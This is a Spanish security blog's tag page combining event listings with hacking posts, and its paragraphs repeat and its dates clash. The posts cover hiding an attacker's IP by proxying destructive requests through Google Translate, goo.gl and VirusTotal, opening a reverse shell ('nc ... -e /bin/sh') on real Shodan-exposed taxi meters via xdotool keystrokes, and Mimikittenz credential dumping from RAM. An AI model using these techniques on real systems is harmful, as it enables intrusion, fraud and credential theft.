Showing posts with label hacking. Show all posts
Showing posts with label hacking. Show all posts
Sunday, January 8, 2017
Hacking en Arganda Talks en la Web y Cursos Online
Hacking en Arganda Talks en la Web y Cursos Online
Hoy toca actualizar la lista de eventos para las dos próximas semanas, que aunque no son demasiados sigue habiendo actividad a tener en cuenta que puede ser de tu interés.
Durante esta semana aún quedan algunas acciones, y durante las dos primeras de Mayo ya tenemos planificados algunos eventos que pueden ser de tu interés. Esta es la pequeña selección para estas dos semanas.
![]() |
| Figura 1: Hacking en Arganda del Rey, Talks en la web y Cursos Online (Abril & Mayo) |
Durante esta semana aún quedan algunas acciones, y durante las dos primeras de Mayo ya tenemos planificados algunos eventos que pueden ser de tu interés. Esta es la pequeña selección para estas dos semanas.
Eleven Path Talks [Online]
Como sabéis, con esta iniciativa estamos impartiendo sesiones de una hora a través de Internet todos los jueves, para hablar de diferentes temas de seguridad en general y de nuestras tecnologías en particular. Las próximas sesiones previstas son:
- 28 de Abril: Big Data y la seguridad de la información [Portugués]- 05 de Mayo: Big Data y la seguridad de la información [Español]
- 12 de Mayo: Defensa en Profundidad (Defense in Depth)
![]() |
| Figura 2: Eleven Paths Talks |
Las sesiones ya impartidas yo las recojo en este artículo: Sesiones de Eleven Paths Talks, y la lista de las siguientes a las que puedes apuntarte está en la web de Eleven Paths Talks.
Empleo Digital [Madrid]
Este viernes participaré en un acto en la Fundación Telefónica dedicado a la búsqueda de empleo en el mundo digital. Será en el auditorio de Telefónica en Gran Vía y está enfocado a ayudar a enfocar a los jóvenes que están en búsqueda de Empleo Digital hacia las tecnologías y profesiones demandadas por las empresas tecnológicas.
EastMadH4ck [Arganda del Rey]
Está dividido en dos sesiones que tendrán lugar el 30 de Abril y 7 de Mayo (ambos días son sábado). Las agendas las tienes disponibles aquí:
Cursos Seguridad Informática [Online]
Figura 5: Curso Online Universitario de Perito en Informática Forense
Y esto es todo por ahora. A mediados de Mayo os haré una actualización, porque tenemos un evento gordo en Eleven Paths para finales de Mayo, pero no os puedo dar la información aún, y además hay más cosas para finales del mes que entra que os pueden interesar.
Saludos Malignos!
Empleo Digital [Madrid]
Este viernes participaré en un acto en la Fundación Telefónica dedicado a la búsqueda de empleo en el mundo digital. Será en el auditorio de Telefónica en Gran Vía y está enfocado a ayudar a enfocar a los jóvenes que están en búsqueda de Empleo Digital hacia las tecnologías y profesiones demandadas por las empresas tecnológicas.
![]() |
| Figura 3: Empleo Digital |
Yo participaré con una pequeña charla y hablaré de la Seguridad Informática y el trabajo que hacemos en Eleven Paths.
EastMadH4ck [Arganda del Rey]
Una nueva reunión con charlas para hablar de seguridad y hacking en el este de Madrid, en concreto en Arganda del Rey. Ahí colaboramos desde 0xWord y podrás conseguir todos los libros del catálogo directamente en el evento.
![]() |
| Figura 4: EastMadH4ck |
Está dividido en dos sesiones que tendrán lugar el 30 de Abril y 7 de Mayo (ambos días son sábado). Las agendas las tienes disponibles aquí:
- Agenda 30 de Abril de EastMadHack
- Agenda 7 de Mayo de East MadHack
Entre las charlas, pues un poco de todo: malware, pentesting, hacking, demos, etcétera. Para aprender un poco más, que nunca es malo.
Como sabéis, en los cursos de The Security Sentinel participamos desde 0xWord con el material que se entrega a los alumnos. Son cursos impartidos online, con entre 6 y 10 semanas de duración y enfocados en temas concretos. Los siguientes cursos que se van a impartir son los siguientes:
9 de Mayo - Seguridad en Redes: Es un curso de 8 semanas de duración y en él se entrega el libro de 0xWord de Ataques en redes de datos IPv4 & IPv6 en el que yo escribí en la parte dedicada a IPv6.
23 de Mayo - Hacking Ético Avanzado: Es un curso de 9 semanas de duración orientado a explicar técnicas avanzadas de explotación y post-explotación. En él se entrega el libro de "Pentesting con PowerShell".
Por último, os dejo información de un Curso Online Universitario de Especialización en Perito en Informática Forense que imparte la Universidad Europea Miguel de Cervantes y en el que se entregan también los libros de 0xWord. En este vídeo tienes una explicación del contenido del curso.
Figura 5: Curso Online Universitario de Perito en Informática Forense
Y esto es todo por ahora. A mediados de Mayo os haré una actualización, porque tenemos un evento gordo en Eleven Paths para finales de Mayo, pero no os puedo dar la información aún, y además hay más cosas para finales del mes que entra que os pueden interesar.
Saludos Malignos!
Sigue Un informático en el lado del mal - Google+ RSS 0xWord

Available link for download
Friday, December 16, 2016
Hacking web Camuflaje
Hacking web Camuflaje
La idea reside, queremos revisar un volcado de una base de datos, o quizá insertar un nuevo usuario administrador. Bueno, ya puedes imaginar por donde van los tiros. Para ello, podemos bien introducir la url en nuestro programa favorito, navegador, etc. O quizá dejar que sea otro el que haga la operación por nosotros
El 31 de octubre, en el blog de Chema Alonso, se publicaba la siguiente información: Post. La gracia reside, en que fallos de este tipo existen en múltiples sitios. Pero si utilizamos una herramienta, o decidimos visitar la url, en el log de registro ¡Tacatá! Queda bien visible nuestra dirección ip.
Para comprobar si saldría nuestra dirección, o la del sistema que utilizamos a modo proxy, he utilizado este código PHP:
<?phpEl código es muy muy simplón. Recibe desde la variable Borrar, la información. Si está vacio, es decir la página en cuestión que utilizamos a modo proxy, elimina la parte peligrosa, nos muestra el campo como vacio. En cambio, si nos deja entrar hasta la cocina. Nos registra en el fichero, el texto recibido por la variable, y la dirección IP, para asegurar que nos deja hacer de proxy.
$borrar = $_GET["borrar"];
if ($borrar == "")
{
$borrar = "Vacio";
}else{
echo "¡Bien! ¡Me borraste la base de datos!<br><br>";
echo $_SERVER[REMOTE_ADDR];
}
$fp = fopen("Registro.txt","a");
fwrite($fp, $_SERVER[REMOTE_ADDR] . - . $borrar ." ");
fclose($fp);
?>
¡Ahora la parte divertida! ¡Las pruebas! (Y no son las 7 pruebas de Asterix)
La primera, demostrando inteligencia. Te dejo adivinar el motivo por el que no funciona. Me hizo gracia, y le plante la captura. No se puede ir con prisas.
Ahora sí, utilizando google translate:
Goo.gl (El acortador de url)
VirusTotal (La zona de análisis web)
Algunos de estos sitios, goo.gl, translate, muestran el resultado del ataque, en la propia pantalla, por lo que podremos saber de inmediato si ha funcionado. Tras todas estas pruebas, así es como me ha quedado el log. (Creo que virustotal, comprueba la página en google)
Como siempre, para continuar escondiendo la dirección ip origen de esta petición, se podría utilizar la red tor.
¿Y a tí, que sitios se te ocurren?
Update:
-Si te interesa a forma de anexo, y pruebas recomendables sobre variables de entorno y demás: RTM Essential 5. Página 22. Anonymous caso práctico. Extraído del blog: www.dragonjar.org
-Si te interesa a forma de anexo, y pruebas recomendables sobre variables de entorno y demás: RTM Essential 5. Página 22. Anonymous caso práctico. Extraído del blog: www.dragonjar.org
La contraseña es: www.dragonjar.org
via Mi equipo está loco
Available link for download
Thursday, December 8, 2016
Calendario en Mayo para estar al día en Seguridad Informática Conferencias Hacking
Calendario en Mayo para estar al día en Seguridad Informática Conferencias Hacking
La segunda quincena de Mayo viene cargada de actividad, así que antes de que se me pase más tiempo os dejo la lista completa de actividades en las que voy a estar yo, o participamos desde Eleven Paths o desde 0xWord, para que estéis informados hasta el último detalle y no os perdáis nada que no queráis perderos. Esta es la lista de cosas que tenemos planificadas.
![]() |
| Figura 1: Calendario en Mayo para estar al día en Seguridad Informática |
Eleven Paths Talks [Online]
Durante este mes de Mayo tendremos tres sesiones más impartidas por nuestros CSA. Una de ellas será en inglés y las otras dos en español. Estas son a las que te puedes apuntar gratuitamente:
- 12 de Mayo: Defensa en Profundidad
- 19 de Mayo: The ISF Standard of Good Practice for Information Security
- 26 de Mayo: Deep Web
Todas las sesiones quedan grabadas y las puedes ver otra vez online. Yo las voy recopilando en este artículo de la web: Sesiones de Eleven Paths Talks grabadas
Figura 2: Eleven Paths Talks
Masterclass en la UEM [Villaviciosa de Odón & Online]
Como todos los años, dentro de las actividades del Máster de Seguridad de la UEM, yo suelo impartir una conferencia gratuita para todo el mundo en la universidad. Este año será el 18 de Mayo por la tarde en Villaviciosa de Odón, pero podrás seguirla online por streaming como es habitual.
![]() |
| Figura 3: 18 de Mayo, Masterclass en la UEM |
Para asistir debes registrarte previamente que el número de plazas es limitado. La sesión será sobre la gestión de la seguridad y la función de los responsables de seguridad en las organizaciones.
MGS Seguros [Barcelona]
El 19 de Mayo participaré en un evento con MGS Seguros en Barcelona, dando una charla sobre estafas en Internet y las precauciones que deben seguirse. Este evento creo que es privado, así que no sé si podréis apuntaros. Os informo si hay cambios.
Locard Cyber Security Summit [Estambul]
Como ya se ha publicado, el próximo 20 de Mayo participaré, mediante una charla de Vídeo Conferencia, en la jornada que va a tener lugar en Estambúl. Será el evento Locard Cyber Security Summit, y por desgracia no podrás seguirla vía streaming este año.
X1Red+Segura [Madrid]
También el 20 de Mayo participaré con una charla en las jornadas de X1Red+Segura que organiza el gran Angelucho con pasión, animo de ayudar y energía. El evento será en Madrid y puedes apuntarte en la web de las jornadas.
The Security Sentinel [Online]
Durante el mes de Mayo, el calendario de cursos online de The Security Sentinel, en los que se entrega como material los libros de 0xWord, será el siguiente:
- 23 de Mayo: Curso Online de Hacking Ético Avanzado
- 30 de Mayo: Curso Online de Análisis Forense Informático
Además, sigue abierto la matricula al Curso Universitario Online de Especialización en Perito Forense Informático que se da con la Universidad Europea Miguel de Cervantes.
Seguridad en IoT [Madrid]
El día 25 de Mayo, dentro de la II Feria del empleo en mundo digital 2016, tendrá lugar el Congreso de Inteligencia Artificial i.a.RTe Digital en el que tendrá lugar por la tarde una mesa de debate sobre la seguridad en el mundo IoT donde yo participaré. Tienes toda la información en la web.
Security Day 2016_: Security Evolution [Madrid]
El 26 de Mayo tenemos un día importante en Eleven Paths ya que hacemos una puesta en común con nuestros clientes para enseñarles los avances tecnológicos en los que hemos estado trabajando, las novedades en los servicios ya existentes y alguna sorpresa más. El registro está casi lleno, así que si deseas venir, regístrate cuanto antes.
![]() |
| Figura 4: Security Day 2016_ |
Tal vez hay algún cambio más durante este tiempo, pero ya os avisaré. Como resumen día a día, esta es la lista completa de las cosas que tenemos por delante. La leyenda es [G] Gratuito y [*] que significa que yo participo.
11 de Mayo: Fundación Rais [Alcobendas] [G][*]Saludos Malignos!
12 de Mayo: Eleven Paths Talks - Defensa en Profundidad [Online] [G]
18 de Mayo: Masterclass UEM [Villaviciosa de Odón & Online] [G][*]
19 de Mayo: MGS Seguros [Barcelona][*]
19 de Mayo: Eleven Paths Talks - The ISF Standard (ENG) [Online][G]
20 de Mayo: Locard Cyber Security Summit [Estambul][*]
20 de Mayo: X1Red+Segura [Madrid][G][*]
23 de Mayo: Curso Hacking Ético Avanzado [Online]
25 de Mayo: Seguridad en IoT [Madrid][*]
26 de Mayo: Eleven Paths Security Day 2016 [Madrid][G][*]
26 de Mayo: Eleven Paths Talks - Deep Web [Online][G]
30 de Mayo: Curso Análisis Forense Informático [Online]
Sigue Un informático en el lado del mal - Google+ RSS 0xWord

Available link for download
Labels:
al,
calendario,
conferencias,
dãa,
en,
estar,
hacking,
informã¡tica,
mayo,
para,
seguridad
Thursday, November 24, 2016
Eleven Paths Talks Ethical Hacking y Securmática 2016
Eleven Paths Talks Ethical Hacking y Securmática 2016
Con el comienzo de la segunda quincena de Abril aprovecho para dejaros un pequeño calendario de cursos, eventos y actividades en las que nos vamos a ver envueltos, por si alguna de ellas fuera de vuestro interés. Como siempre, os dejo aquellas en las que participo yo, participa alguno de mis compañeros de Eleven Paths o Telefónica, o colaboramos desde 0xWord.
Esta es la pequeña lista de eventos y cursos que os dejo para lo que nos queda de mes por si alguna de ellas es de vuestro interés. Aquí van.
![]() |
| Figura 1: Eleven Paths Talks, Curso de Ethical Hacking, Madrid Excelente y Securmática 2016 |
Esta es la pequeña lista de eventos y cursos que os dejo para lo que nos queda de mes por si alguna de ellas es de vuestro interés. Aquí van.
Eleven Paths Talks
En estas dos semanas vamos a tener dos sesiones más dedicadas a hablar de tecnología a través de nuestra iniciativa Eleven Paths Talks. Como sabéis, son sesiones gratuitas que se imparten vía web los jueves a las 15:30 (GMT+2) para que todo el mundo pueda conectarse a un horario diurno.
En el calendario le toca el turno esta segunda quincena de Abril a las siguientes charlas:
![]() |
| Figura 2: Eleven Paths Talks |
En el calendario le toca el turno esta segunda quincena de Abril a las siguientes charlas:
- 21 de Abril - Gestión de la Seguridad: Impartida por Leonardo Huertas, Eleven Paths CSA Colombia.
- 28 de Abril - Big Data: Impartida por Leandro Benaton, Eleven Paths CSA Brasil. Esta sesión se impartirá en Portugués.
El calendario completo de las sesiones lo tenéis en la web de las Eleven Paths Talks, junto con enlaces a los vídeos de las sesiones ya impartidas.
Curso de Ehtical Hacking
El lunes 25 de Abril dará comienzo una nueva edición del Curso Online de Ethical Hacking que imparten durante 9 semanas a través de Internet en The Security Sentinel. Los asistentes al curso reciben como material de estudio los libros de "Pentesting con FOCA" y "Metasploit para pentesters" de 0xWord.
Figura 3: Descripción del Curso Online de Ethical Hacking
En el vídeo de arriba explican en detalle en qué consiste esta formación, cómo se imparte y los objetivos que alcanzan los alumnos que lo completan. En la web del curso tienes toda la información sobre contenidos y registro para asistir al mismo: Curso Online de Ethical Hacking
Madrid Excelente [Madrid]
El próximo día 25, en Madrid, tendrá lugar un evento dedicado a la economía digital. La jornada es día completo y yo participaré a primera hora de la tarde con un pequeña sesión sobre seguridad en el mundo empresarial.
![]() |
| Figura 4: VIII Congreso Internacional de Excelencia |
Serán consejos basados en la experiencia que muchos ya conocéis: Do the BASICS. Tienes la agenda completa y el proceso de registro en la web VIII Congreso Internacional de la Excelencia.
Securmática [Madrid]
Para acabar el mes, Securmática 2016, durante los días 26, 27 y 28 de Abril. En esta edición estarán nuestros compañeros Adolfo Hernández, que es el responsable de Tacyt en nuestra unidad, hablando sobre la gestión de la ciberseguridad en la empresa, y Manuel Carpio, nuestro CISO en Telefónica. Aquí tenéis el programa completo de Securmatica 2016.
![]() |
| Figura 5: Securmática 2016 |
Yo aprovecharé para pasarme por la cena el día 27 de Abril y ver a amigos, compañeros y demás asistentes a las sesiones. El calendario de estas próximas dos semanas queda como sigue. En él, la leyenda es [G] Gratuito y [*] en los eventos en que participo yo directamente.
21 de Abril: Eleven Paths Talks: Gestión de la seguridad [Online] [G]25 de Abril: VIII Congreso Internacional de la Excelencia [Madrid] [G][*]25 de Abril: Curso Online de Ethical Hacking [Online]26 de Abril: Securmática 2016 [Madrid]27 de Abril: Securmática 2016 (+ Cena) [Madrid] [*]28 de Abril: Securmática 2016 [Madrid]28 de Abril: Eleven Paths Talks: Big Data (Portugués) [Online] [G]
Saludos Malignos!
Sigue Un informático en el lado del mal - Google+ RSS 0xWord

Available link for download
Friday, November 11, 2016
Hacking de taxímetros en España vía Shodan Taxitronic IoT
Hacking de taxímetros en España vía Shodan Taxitronic IoT
¿Quién a día de hoy aún no ha oído hablar del tan conocido y popular IoT (Internet of Things) Internet de las cosas? Los avances tecnológicos nos favorecen en muchos campos de nuestras vidas, pero todo tiene su parte negativa si no nos tomamos en serio los riesgos de una mala utilización y en este caso las consecuencias pueden ser muy negativas. Estamos asistiendo a un cambio en ámbito y en escala con la llegada del IoT - o como algunos dicen, el IoE (Internet of Everything) - que hará que dentro de 5 o 6 años prácticamente todos los electrodomésticos en concreto y objetos en general, tengan de serie conectividad con Internet de algún modo u otro. A día de hoy los coches modernos ya traen esta conexión constante vía 2G, 3G o 4G y todos nosotros llevamos encima al menos un dispositivo conectado a Internet constantemente.
Hace ya mas de un año que se publicó la primera vulnerabilidad en un automóvil que permitía el control total del vehículo, y ya son comunes las vulnerabilidades en SmartTV, en dispositivos móviles, frigoríficos, lavadoras, cámaras de vigilancia, parquímetros de bicicletas e incluso equipos médicos para controlar el latido del corazón dentro del cuerpo de las personas. La gran variedad de dispositivos y de plataformas dificulta mucho la corrección de estos fallos de seguridad, porque en muchísimos casos la actualización de estos dispositivos no es trivial, no existe o el coste del mismo no permite contar con un ciclo de gestión de la seguridad a largo plazo.
Sin embargo, debemos plantearnos que cuando conectamos algo a Internet está expuesto al mundo entero y que del mismo modo que cuando salimos de casa dejamos la puerta cerrada, en Internet debemos hacer lo mismo con todos los dispositivos que nos unen a la red. Es un trabajo de toda la industria que está involucrada en la evolución del IoT o iremos descubriendo caso tras caso, como vivimos en un mundo muy inseguro. Y en el mundo de la empresa, a veces los responsables de seguridad no saben ni que existen esos dispositivos, por eso hablamos del famoso Shadow IoT.
En este caso os traigo un ejemplo muy llamativo, algunos de los taxímetros que se utilizan en España están conectados también a Internet y no de forma muy segura. En muchos taxis se están implementando taxímetros con conexión vía 3G a Internet para de esta forma integrarlos con las rutas más cortas, sistemas de Big Data y distintas aplicaciones móviles que localizan constantemente al vehículo para enviarle de forma directa una nueva petición de transporte. Sin embargo, una vez más, la mala configuración de estos dispositivos puede conllevar que los trayectos de taxi te salgan gratis o al doble de precio, generando un posible problema para el usuario o para el taxista, depende de lo que un posible atacante quiera realizar.
El ejemplo que os voy a poner hoy es el de los Taxímetros 3G de Taxitronic. Basta con leer documentación de los taxímetros que anuncian en su web para saber que usan un sistema GNU/Linux embebido y con algo más de documentación en Internet es fácil descubrir que la distribución que usan es Pengutronix.
Sabiendo la plataforma que usan y que cuentan con conexión a Internet de forma autónoma a cualquiera se le puede pasar por la cabeza hacer un poco de hacking con buscadores e intentar localizar estos dispositivos a través Shodan para saber qué tienen abierto al mundo. Shodan no es un buscador al uso, es muy peculiar por su forma de proceder; realiza barridos completos al rango IPv4 - en IPv6 se quiere hacer similar con Mr.Looquer - y recogiendo los banners de cada puerto en cada dirección IP, para que mas tarde nosotros podamos hacer búsquedas por esta información. En esta caso lo usaremos para buscar por los dispositivos que usan esta plataforma, Pengutronix. Su firma en los banners es "Ptxdist"
No todos los taxímetros tienen que aparecer en estos barridos de Shodan, ya que aquellos que se conecten desde detrás de un proxy sin utilizar una dirección IP pública no aparecerán, pero como las redes son complejas y extensas, es fácil dar con taxímetros conectándose vía SIM desde ubicaciones en las que no hay un proxy que oculte su software. Como podemos ver en la imagen anterior obtenemos más de 70 resultados y si nos fijamos, la sorpresa es mayúscula cuando vemos que tienen el puerto 6000, utilizado por el servicio X11, abierto al exterior.
Tener el servicio X11 abierto significa que hay alguna aplicación gráfica - evidentemente la aplicación del taxímetro - que está siendo ejecutada en el entorno gráfico X de la distribución Linux. Este sistema es especialmente modular, ya que igual que se está lanzando contra el servidor X local, se podría forzar a lanzar la aplicación contra un servidor X situado en otra máquina, por ejemplo la máquina de un posible atacante.
El buscador Shodan, desde hace tiempo, no solo se queda en descubrir qué puertos están abiertos en un determinado servidor, sino que además implementa algunos clientes para mostrar más información pública. Así, por ejemplo, en el caso de los servidores MongoDB que no solicitan autenticación, Shodan muestra el nombre y tamaño de las bases de datos. En el caso de los servidores VNC sin autenticación, Shodan muestra un screenshot de la sesión y, por supuesto, en el caso de los servidores X11 sin autenticación, muestra una captura de lo que se está ejecutando allí. En este caso, varios taxímetros de diferentes taxis de España.
Sabiendo esto, podríamos saber lo que está apareciendo en la pantalla del taxímetro en todo momento de una forma tan sencilla como conectarnos remotamente cada cierto tiempo al servidor X11 y pedir una captura de pantalla para generar un fichero con la imagen que allí se ve. Este es el ejemplo siguiente:
En esta caso concreto el taxi estaba libre, pero podemos esperar y realizar capturas cuando el taxi esté ocupado como, por ejemplo, en esta ocasión:
Al igual que podemos tener acceso al display, podemos simular presiones de teclado o movimientos para manejarlo a nuestro gusto. Aunque si pensamos como un malo nuestro interés sería por ejemplo reiniciar el terminal al llegar al destino para que así este marque 0. Esto seria posible con una shell sobre el taxímetro. Como podemos emular las presiones de teclado podemos usar los atajos de teclado:
Reflexión final
Este ejemplo de los taxímetros, es solo un ejemplo de las repercusiones que tiene el despreocuparse de los dispositivos que tenemos conectados a Internet, a veces parece algo lejano y complejo todo este tipo de situaciones, pero están ahí accesibles a cualquiera y a veces de forma muy sencilla. Todos los implicados en el desarrollo y la evolución del IoT en nuestra sociedad, deben tomar su parte de responsabilidad, desde el usuario hasta el fabricante, para evitar situaciones indeseables en el futuro con cosas menos banales, como son los sistemas SCADA.
Saludos,
Autor: Diego Soto
Nota del autor: Algún paso del proceso ha sido omitido para evitar su reproducción fácilmente
![]() |
| Figura 1: Hacking de taxímetros en España vía Shodan |
Hace ya mas de un año que se publicó la primera vulnerabilidad en un automóvil que permitía el control total del vehículo, y ya son comunes las vulnerabilidades en SmartTV, en dispositivos móviles, frigoríficos, lavadoras, cámaras de vigilancia, parquímetros de bicicletas e incluso equipos médicos para controlar el latido del corazón dentro del cuerpo de las personas. La gran variedad de dispositivos y de plataformas dificulta mucho la corrección de estos fallos de seguridad, porque en muchísimos casos la actualización de estos dispositivos no es trivial, no existe o el coste del mismo no permite contar con un ciclo de gestión de la seguridad a largo plazo.
Sin embargo, debemos plantearnos que cuando conectamos algo a Internet está expuesto al mundo entero y que del mismo modo que cuando salimos de casa dejamos la puerta cerrada, en Internet debemos hacer lo mismo con todos los dispositivos que nos unen a la red. Es un trabajo de toda la industria que está involucrada en la evolución del IoT o iremos descubriendo caso tras caso, como vivimos en un mundo muy inseguro. Y en el mundo de la empresa, a veces los responsables de seguridad no saben ni que existen esos dispositivos, por eso hablamos del famoso Shadow IoT.
![]() |
| Figura 2: Taxímetros de Taxitronic |
En este caso os traigo un ejemplo muy llamativo, algunos de los taxímetros que se utilizan en España están conectados también a Internet y no de forma muy segura. En muchos taxis se están implementando taxímetros con conexión vía 3G a Internet para de esta forma integrarlos con las rutas más cortas, sistemas de Big Data y distintas aplicaciones móviles que localizan constantemente al vehículo para enviarle de forma directa una nueva petición de transporte. Sin embargo, una vez más, la mala configuración de estos dispositivos puede conllevar que los trayectos de taxi te salgan gratis o al doble de precio, generando un posible problema para el usuario o para el taxista, depende de lo que un posible atacante quiera realizar.
El ejemplo que os voy a poner hoy es el de los Taxímetros 3G de Taxitronic. Basta con leer documentación de los taxímetros que anuncian en su web para saber que usan un sistema GNU/Linux embebido y con algo más de documentación en Internet es fácil descubrir que la distribución que usan es Pengutronix.
![]() |
| Figura 3: Distribución Pengutronix sobre la que se basa Taxitronix |
Sabiendo la plataforma que usan y que cuentan con conexión a Internet de forma autónoma a cualquiera se le puede pasar por la cabeza hacer un poco de hacking con buscadores e intentar localizar estos dispositivos a través Shodan para saber qué tienen abierto al mundo. Shodan no es un buscador al uso, es muy peculiar por su forma de proceder; realiza barridos completos al rango IPv4 - en IPv6 se quiere hacer similar con Mr.Looquer - y recogiendo los banners de cada puerto en cada dirección IP, para que mas tarde nosotros podamos hacer búsquedas por esta información. En esta caso lo usaremos para buscar por los dispositivos que usan esta plataforma, Pengutronix. Su firma en los banners es "Ptxdist"
![]() |
| Figura 4: Modelos de Taxitronic indexados en Shodan |
No todos los taxímetros tienen que aparecer en estos barridos de Shodan, ya que aquellos que se conecten desde detrás de un proxy sin utilizar una dirección IP pública no aparecerán, pero como las redes son complejas y extensas, es fácil dar con taxímetros conectándose vía SIM desde ubicaciones en las que no hay un proxy que oculte su software. Como podemos ver en la imagen anterior obtenemos más de 70 resultados y si nos fijamos, la sorpresa es mayúscula cuando vemos que tienen el puerto 6000, utilizado por el servicio X11, abierto al exterior.
![]() |
| Figura 5: Puerto 6000 de X Server abierto en distribución Ptxdist |
Tener el servicio X11 abierto significa que hay alguna aplicación gráfica - evidentemente la aplicación del taxímetro - que está siendo ejecutada en el entorno gráfico X de la distribución Linux. Este sistema es especialmente modular, ya que igual que se está lanzando contra el servidor X local, se podría forzar a lanzar la aplicación contra un servidor X situado en otra máquina, por ejemplo la máquina de un posible atacante.
El buscador Shodan, desde hace tiempo, no solo se queda en descubrir qué puertos están abiertos en un determinado servidor, sino que además implementa algunos clientes para mostrar más información pública. Así, por ejemplo, en el caso de los servidores MongoDB que no solicitan autenticación, Shodan muestra el nombre y tamaño de las bases de datos. En el caso de los servidores VNC sin autenticación, Shodan muestra un screenshot de la sesión y, por supuesto, en el caso de los servidores X11 sin autenticación, muestra una captura de lo que se está ejecutando allí. En este caso, varios taxímetros de diferentes taxis de España.
![]() |
| Figura 6: Taxímetros indexados en Shodan directamente |
Sabiendo esto, podríamos saber lo que está apareciendo en la pantalla del taxímetro en todo momento de una forma tan sencilla como conectarnos remotamente cada cierto tiempo al servidor X11 y pedir una captura de pantalla para generar un fichero con la imagen que allí se ve. Este es el ejemplo siguiente:
![]() |
| Figura 7: Captura de una sesión de un taxímetro realizada con xwd |
En esta caso concreto el taxi estaba libre, pero podemos esperar y realizar capturas cuando el taxi esté ocupado como, por ejemplo, en esta ocasión:
![]() |
| Figura 8: Captura hecha con xwd cuando el taxi estaba ocupado |
Al igual que podemos tener acceso al display, podemos simular presiones de teclado o movimientos para manejarlo a nuestro gusto. Aunque si pensamos como un malo nuestro interés sería por ejemplo reiniciar el terminal al llegar al destino para que así este marque 0. Esto seria posible con una shell sobre el taxímetro. Como podemos emular las presiones de teclado podemos usar los atajos de teclado:
xdotool key alt+f2 // abrimos un cuadro de dialogo para ejecutar una aplicaciónSolo tendríamos que conectarnos a esa dirección IP y ese puerto para tener un terminal y ejecutar comandos en el taxímetro. Pero también podríamos entretenernos poniendo el taxímetro en modo salvapantallas o cosas similares. Pero bastante está mal a día de hoy el mundo del taxi como para que les metan más problemas encima de los que preocuparse.
xdotool key x t e r m // escribimos xterm
xdotool key KP_Enter // presionamos Enter para que se abra la terminal
xdotool key n c space [ip] space [puerto] space minus e space slash b i n slash s h KP_Enter <<< Escribimos en el terminal remoto nc [ip] [puerto] -e /bin/sh
Reflexión final
Este ejemplo de los taxímetros, es solo un ejemplo de las repercusiones que tiene el despreocuparse de los dispositivos que tenemos conectados a Internet, a veces parece algo lejano y complejo todo este tipo de situaciones, pero están ahí accesibles a cualquiera y a veces de forma muy sencilla. Todos los implicados en el desarrollo y la evolución del IoT en nuestra sociedad, deben tomar su parte de responsabilidad, desde el usuario hasta el fabricante, para evitar situaciones indeseables en el futuro con cosas menos banales, como son los sistemas SCADA.
Saludos,
Autor: Diego Soto
Nota del autor: Algún paso del proceso ha sido omitido para evitar su reproducción fácilmente
Sigue Un informático en el lado del mal - Google+ RSS 0xWord

Available link for download
Labels:
de,
en,
espaã±a,
hacking,
iot,
shodan,
taxãmetros,
taxitronic,
vãa
Tuesday, November 8, 2016
Mimikittenz Dumpea passwords de la RAM like a boss PowerShell Pentest Hacking
Mimikittenz Dumpea passwords de la RAM like a boss PowerShell Pentest Hacking
En los últimos meses hemos hablado bastante sobre debilidades en la memoria RAM y la información que podemos encontrar en ella. Echando la vista atrás podemos encontrar Cómo sacar la contraseña de Gmail de la memoria del proceso de Firefox utilizando Metasploit, Cómo proteger tu password cuando está en memoria RAM o Cómo volcar credenciales del proceso KeePass con Meterpreter. Esta serie de artículos nos dio para poner de relevancia que la memoria RAM es un entorno muy volátil, pero a la par bastante inseguro por naturaleza y con información sensible, por lo que hay que proteger cualquier volcado que se haga de ella como si fueran datos de una aplicación. La fase de post-explotación, a día de hoy, tiene un punto marcado a fuego dónde debemos verificar que no podemos extraer identidades digitales de la memoria RAM.
Hace no más de una semana se ha liberado una herramienta llamada Mimikittez, la cual es un script de Powershell para pentesters, que se encarga de leer diferentes procesos, que podemos definir, y lanzar expresiones regulares en busca de leaks con contraseñas y usuarios. El script es potente, ya que podríamos utilizarlo a través de una sesión de Metasploit con el payload de Powershell, y poder aprovecharnos en remoto de esta característica. No hay que olvidar a Netripper que también nos permite, a través de Powershell, hookear procesos e interceptar, antes de que sea cifrado, el contenido de la comunicación.
Mimikittenz es una herramienta de post-explotación dónde se utiliza la función ReadProcessMemory() para extraer las credenciales en texto plano de varios procesos. La herramienta también puede extraer otro tipo de información definida como jugosa de otros procesos. Además, la herramienta no está atada a ser ejecutada con privilegios de administrador, se puede utilizar desde un contexto de usuario, siempre y cuando los procesos sean del usuario en cuestión.
Mimikittenz presenta una estructura interesante y extensible gracias a dos funciones: AddRegex e InspectManyProcs. La primera permite que, con un poco de maña, manipulemos el script con el objetivo de añadir expresiones regulares con las que comparar información en el análisis del proceso. Viendo el código encontramos esta función:
De forma sencilla podemos añadir expresiones regulares para realizar las búsquedas en los procesos. Si observamos el código de Powershell que presenta el script encontramos lo siguiente:
Echando un ojo a la ejecución de Mimikittenz vemos como se mostraría la información tras una ejecución del script en la máquina. Mimikittenz va abriendo los diferentes procesos indicados anteriormente y leyendo de ellos el contenido en memoria RAM. En ese momento se van pasando las diferentes expresiones regulares en busca de coincidencias. En el caso de encontrar una coincidencia se almacena el valor para ser, posteriormente, mostrado.
Es una herramienta de post-explotación bastante interesante y que automatiza el proceso de mirar dentro de la memoria en busca de leaks de información sensible por parte de las aplicaciones. Para el caso del gestor KeePass se podría realizar una serie de expresiones regulares con la intención de obtener la información sensible de la memoria.
A modo de ejemplo, se añade una nueva expresión regular en el script de Mimikittenz. Como se puede ver es muy sencillo de añadir. La expresión regular funcionaría para el sitio web de El Otro Lado, pero también para otros muchos dónde se encontrara un parámetro denominado password seguido del signo = y con diversos caracteres después. En la siguiente imagen se puede ver cómo queda el código.
Actualmente, ya comenté que lleva apenas diez días en Github, la herramienta permite extraer credenciales de memoria RAM de diferentes servicios. La herramienta los agrupa por categorías, las cuales enumero a continuación:
El potencial del script es alto, y lo que más me ha gustado es que es muy personalizable y de forma muy sencilla. Herramienta necesaria para nuestra mochila en la fase de post-explotación de sistemas Windows por dónde vayamos accediendo en la auditoria. Veremos a muchos pentesters llevando a Mimikittenz en su mochila alineada con nuestro Meterpreter para sacar el máximo provecho al lateral movement.
Autor: Pablo González Pérez (@pablogonzalezpe)
Escritor de los libros "Metasploit para Pentesters", "Ethical Hacking", "Got Root" y Pentesting con Powershell
![]() |
| Figura 1: Mimikittenz. Dumpea passwords de la RAM "like a boss" |
